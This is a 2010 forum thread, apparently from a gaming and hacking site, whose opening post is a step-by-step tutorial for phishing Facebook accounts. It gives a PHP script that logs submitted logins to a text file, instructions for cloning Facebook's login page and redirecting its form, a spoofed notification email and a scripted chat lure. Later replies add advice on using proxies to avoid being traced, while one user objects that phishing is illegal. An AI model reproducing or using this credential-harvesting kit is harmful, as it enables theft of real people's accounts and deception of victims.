Post: Tutorial on howto hack Facebook accounts. (Phishing)
05-07-2010, 08:12 AM #1
lxzer
Do a barrel roll!
(adsbygoogle = window.adsbygoogle || []).push({});
Hack
A


Facebook


Account



Gaining access to ones Facebook account without any prior knowledge to the users password prior to phishing is not as hard as one may pres-eve it to be. Read on and you will learn how to do this.

How will this be done? You will be able to gain acess to another users facebook profile by using a method known as "phishing"

Phishing.

What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.

Lets get started!

HOW

Sign up on a free webpage hosting site. I prefer You must login or register to view this content. as it is the easiest free hosting site to use (in my opinion) and doesn't remove your webpage once it has been created.

Once you have signed up click on " You must login or register to view this content. "

Now click on " You must login or register to view this content. "

Once you are in your files click on create text file.

You are going to need to name the file " Login.php " (Don't include quotations )

You are now going to visit this site by clicking You must login or register to view this content.

You are going to now view the source of the page and select all of the text, you are going to copy the text.

now go on back to your text file named " login.php " that you made earlier. You are going to paste the text that you copied from Facebook into your text file. Once done, click on "create"

Now go back to " My Files " And create another text file.

You are going to name this file " Phishing.php " (Don't include quotations )

now copy and paste this:

Originally posted by another user
<?php
header ('Location: You must login or register to view this content. 'Winky Winky;
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>


Replace "XXXXXXXXXXXXXXXX" with your ripway username.

Now click on create.

go back to " my files " and your going to want to click on "edit" for your " login.php " file.

Once your editing " login.php " Your going to want to click in the body of the text and hit Ctrl F. This will open up a find function and your going to type in " action " ( without quotations )

It will bring you to something like this:


action="https://login.facebook.com/login.php?login_attempt=1"

your going to want to select everything within the quotations. ( You will select " You must login or register to view this content. " )

Now replace this with:

action="https://h1.ripway.com/XXXXXXXXXXXXXXXX/phishing.php?"

Replace the XXXXXXXXX's with your ripway username.

now click on " save "

Go back to " My Files " and go to where it says:

login.php
Direct Link: You must login or register to view this content.
[ Get HTML Codes | Rename | Edit ]

Copy " You must login or register to view this content. " The XXXX's will be your ripway username.

This is what your link to your webpage is, when you send this to people and they login to it their email and password will be displayed in " passwords.txt "

If at anytime you wish to view the email and password they entered just simply edit " passwords.txt " and bobs your uncle :y:

If for whatever reason this didn't work, then please ask a question on this thread. If this helped you then don't forget to thank or +REP me! Happy

Where I learned this: [ame="https://www.youtube.com/watch?v=0fJOxdDjPn8"]LINK.[/ame]

HOWTO CONVINCE YOUR VICTIM TO LOGIN TO YOUR FAKE WEBPAGE.


There is several ways this may be accomplished but one that almost always works is to email spoof your victim and appear as if your Facebook. I personally like to use " [email][email protected][/email] " as it is the official notification email sender for Facebook.

Simply putting in " You must verify your Facebook account " persons name " failure at verifying your account will result in termination of your account.

Or you could simply put something like:

Bob Smith commented on his status:

"that doesn't make sense"

Reply to this email to comment on this status.

To see the comment thread, follow the link below:
You must login or register to view this content.

Thanks,
The Facebook Team

___
Find people from your Windows Live Hotmail address book on Facebook! Go to: You must login or register to view this content.

This message was intended for private@ private.com. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.
You must login or register to view this content.
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.


There is quiet a few tutorials on email spoofing but for a quick easy way to start email spoofing just use this You must login or register to view this content.

Also just talking over MSN and starting up a convo maybe saying things like:

You say: Hey

Target says: Hey

You say: Whats up?

Target says: Nothing jc, you?

You say: Nothing bored, you know bob was talking shmmmaccck about you right?

Target says: no, what?

You say: Yea its on Facebook he was calling you a silly pelican

Target says: that kid really grinds my gears, where did he post this?

You say: You must login or register to view this content.


And bobs your uncle :y:

Use whatever method works for you or create your own and post them here. Also Sending ripway links or any other phishing links directly over Facebook chat will get you suspended for a day or two, as i was suspended.

Plain and simple, this is as far as I know the only trojan/backdoor/keylogger free way to gain access to someones Facebook account. There is no " Facebook password cracker " Out there that works as far as im aware.

This was my first tutorial I have posted on this site so give me some critique, or if you thought it was a good tutorial or not!

This is pretty simple, but if you have any problems then just let me know!

If this helped you then don't forget to thank or +REP!
(adsbygoogle = window.adsbygoogle || []).push({});

The following 33 users say thank you to lxzer for this useful post:

2RAW4THESTREET, Car Lover, Chewcracka, Classy., Cpt.Hayden, Darknesse13, Docko412, Encopresis, ESQ_Pugh, FAKA_ELITE, FourzerotwoFAILS, free, Goutinator, Joshycc, Matt1511, Mezzid, Mr. Star, Mudkipzzzz, Nejidam, NeverMoreModz, ozzy21, PatheticBowler, Perfekt, Pichu, Pro Era, Samos95, Toon_Squad, Weescotty, wiseguy48, wite_guy, xMagiik
06-21-2010, 10:06 PM #47
lxzer
Do a barrel roll!
Originally posted by Unit View Post
The people getting hacked care, and if you mess with the wrong person you will end up getting caught. They simply have to get the IP of the one who logged in on the account, contact their ISP regarding the matter and the ISP can look at logs and monitor traffic. Then they will see the uploading/hosting of the copyrighted/phishing content and can terminate their service as well as take legal action if the victim feels it is necessary.


The ISP is not going to take the time to find out who hacked their account, if your going to be this afraid to phish someones account then you can always use a proxy server or a static IP, then there is no way that you are going to get caught.
06-21-2010, 10:10 PM #48
SuperYuper
Vault dweller
Originally posted by braddersd View Post
urm is this allowed in the rules??


he's probably going to hack your facebook account now :evil:.


Why would you want to hack someone's facebook account? Isn't that mean?
06-21-2010, 10:16 PM #49
Originally posted by lxzer View Post
The ISP is not going to take the time to find out who hacked their account, if your going to be this afraid to phish someones account then you can always use a proxy server or a static IP, then there is no way that you are going to get caught.


I dont think you know what an ISP is.. the ISP is an internet service provider..the one whom you(or your parent/guardian) pays to give you internetz. They WILL look at logs and monitor activity if someone reports abuse or contacts them regarding the matter.

Now, proxy servers, especially free and HTTP proxy servers DO NOT protect you entirely. It merely masks your IP from being logged. Even VPN's and paid proxy's keep logs. So if they report the proxy's IP they will simply look at logs of the original IP who accessed their server and can then report them to their true ISP or law enforcement agency.

Regardless, this is against US law and should not be allowed imo.
06-21-2010, 10:45 PM #50
lxzer
Do a barrel roll!
Originally posted by Unit View Post
I dont think you know what an ISP is.. the ISP is an internet service provider..the one whom you(or your parent/guardian) pays to give you internetz. They WILL look at logs and monitor activity if someone reports abuse or contacts them regarding the matter.

Now, proxy servers, especially free and HTTP proxy servers DO NOT protect you entirely. It merely masks your IP from being logged. Even VPN's and paid proxy's keep logs. So if they report the proxy's IP they will simply look at logs of the original IP who accessed their server and can then report them to their true ISP or law enforcement agency.

Regardless, this is against US law and should not be allowed imo.


I know what an ISP is.

How do you even know that they WILL? You just assume that they will? Just because they can doesn't mean that they will.

The whole process of getting the users IP is much to long and the ISP isn't going to go the whole nine yards to give you someones IP which by the way the ISP cannot give you without consent from the police, which IF you end up getting the IP you would have to go to the police to find out who the IP belongs to, then you have to get a lawyer, pay court costs, press charges, all just because someone hacked your facebook account. If you decided to sue them you wont even get your money back, you will have spent more money on your lawyer and court costs then you end up getting back, not to mention all the time you have wasted.

Also, I do not live in the US I live in Canada.

Why do you come to a forum that is dedicated to hacking then proceed to point out that hacking is illegal? All this does is lead to stupid arguments, like this one.

Hackers always win. ALWAYS.

:rolleyes::rolleyes::rolleyes::rolleyes::rolleyes::rolleyes::rolleyes::rolleyes:
06-21-2010, 11:01 PM #51
Originally posted by lxzer View Post
I know what an ISP is.

How do you even know that they WILL? You just assume that they will? Just because they can doesn't mean that they will.

The whole process of getting the users IP is much to long and the ISP isn't going to go the whole nine yards to give you someones IP which by the way the ISP cannot give you without consent from the police, which IF you end up getting the IP you would have to go to the police to find out who the IP belongs to, then you have to get a lawyer, pay court costs, press charges, all just because someone hacked your facebook account. If you decided to sue them you wont even get your money back, you will have spent more money on your lawyer and court costs then you end up getting back, not to mention all the time you have wasted.

Also, I do not live in the US I live in Canada.

Why do you come to a forum that is dedicated to hacking then proceed to point out that hacking is illegal? All this does is lead to stupid arguments, like this one.

Hackers always win. ALWAYS.

:rolleyes::rolleyes::rolleyes::rolleyes::rolleyes::rolleyes::rolleyes::rolleyes:


First of all, hackers DO NOT always win, and most end up doing time, especially if in the United States. The "wannabe" hackers AKA skids like you, they usually do not face any punishments as they are not true black hat hackers, although they may seem to think otherwise. Canada still enforces cyber terrorism as well as copyright infringement.

Secondly, it is extremely easy to get an IP, and although you may require legal action to get an IP, you can still report the person for fraudulent activity by contacting the ISP's abuse department which can lead to their activity being monitored or their logs being investigated. I also do not think you realize phishing is also COPYRIGHT INFRINGEMENT. You are not only stealing information of the user but you are also posing as the company or corporation you have set up the script for.

I also do not think you realize that you can easily take legal action and make money. This should not be your purpose, but suing the one whom phished you is extremely easy. If you win your case you can have the defendant cover the fees.

This forum is not ENTIRELY based on hacking, and I don't think your judgement as to why I joined rationalizes in any way.

Take a look at this article for a quick read onto those punished for simply hacking an email. Granted, not everyone is Sarah Palin, but people are punished for these "petty" crimes you seem to think they are, however they just do not make news.

You must login or register to view this content.
06-21-2010, 11:18 PM #52
lxzer
Do a barrel roll!
Originally posted by Unit View Post
First of all, hackers DO NOT always win, and most end up doing time, especially if in the United States. The "wannabe" hackers AKA skids like you, they usually do not face any punishments as they are not true black hat hackers, although they may seem to think otherwise. Canada still enforces cyber terrorism as well as copyright infringement.

Secondly, it is extremely easy to get an IP, and although you may require legal action to get an IP, you can still report the person for fraudulent activity by contacting the ISP's abuse department which can lead to their activity being monitored or their logs being investigated. I also do not think you realize phishing is also COPYRIGHT INFRINGEMENT. You are not only stealing information of the user but you are also posing as the company or corporation you have set up the script for.

I also do not think you realize that you can easily take legal action and make money. This should not be your purpose, but suing the one whom phished you is extremely easy. If you win your case you can have the defendant cover the fees.

This forum is not ENTIRELY based on hacking, and I don't think your judgement as to why I joined rationalizes in any way.

Take a look at this article for a quick read onto those punished for simply hacking an email. Granted, not everyone is Sarah Palin, but people are punished for these "petty" crimes you seem to think they are, however they just do not make news.

You must login or register to view this content.


ClapsClapsClaps

Dont post complaints about hacking being illegal on a thread that is about hacking. When this site was first created, it was created for the purpose of hacking. Yes I know how easy it is to get an IP, It takes me one second to get ones IP simply saying go to this site: ___ when they click I get their IP and then redirects them to another site.

I am 15 years old, obviously im not "teh true black hat hacker"

Getting an IP is easy, getting who it belongs to is not.

You keep going on about the same thing in each of your comments, EVERYONE HERE KNOWS THAT PHISHING IS ILLEGAL. Congratulations do you want a cookie?

If you afraid of getting caught I will repeat, there is several programs that make your ip static and also have the option to change it to another one.

Heres a thought: Why not get the IP of your victim then change your IP to theirs? That fixes everything.

Obviously shit is going to happen when you hack sarah palins email.

You may continue your ranting if you wish.
06-21-2010, 11:25 PM #53
Originally posted by lxzer View Post
ClapsClapsClaps

Dont post complaints about hacking being illegal on a thread that is about hacking. When this site was first created, it was created for the purpose of hacking. Yes I know how easy it is to get an IP, It takes me one second to get ones IP simply saying go to this site: ___ when they click I get their IP and then redirects them to another site.

I am 15 years old, obviously im not "teh true black hat hacker"

Getting an IP is easy, getting who it belongs to is not.

You keep going on about the same thing in each of your comments, EVERYONE HERE KNOWS THAT PHISHING IS ILLEGAL. Congratulations do you want a cookie?

If you afraid of getting caught I will repeat, there is several programs that make your ip static and also have the option to change it to another one.

Heres a thought: Why not get the IP of your victim then change your IP to theirs? That fixes everything.

Obviously shit is going to happen when you hack sarah palins email.

You may continue your ranting if you wish.


Hacking is a broad term that is missused by many..

Hacking simply means the exploration of computers.

Phishing is illegal. I am not saying you should not hack, I am saying you should not phish.

You just said getting an IP takes forever and is hard..now you change your story and say it is easy..

And no, I do not want a cookie, I simply do not believe this thread should exist
06-22-2010, 04:14 AM #54
madden's Hoe
< ^ > < ^ >
Originally posted by SuperYuper View Post
he's probably going to hack your facebook account now :evil:.


Why would you want to hack someone's facebook account? Isn't that mean?


haha u think im going to get phished? u fail
06-22-2010, 06:23 AM #55
exhaale
Do a barrel roll!
yeah well, firefox prevents this from happening by telling you the website isn't legit. at least it does for me i think ... and anyways you'd have to be fairly retarded to fall into one of these traps?

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo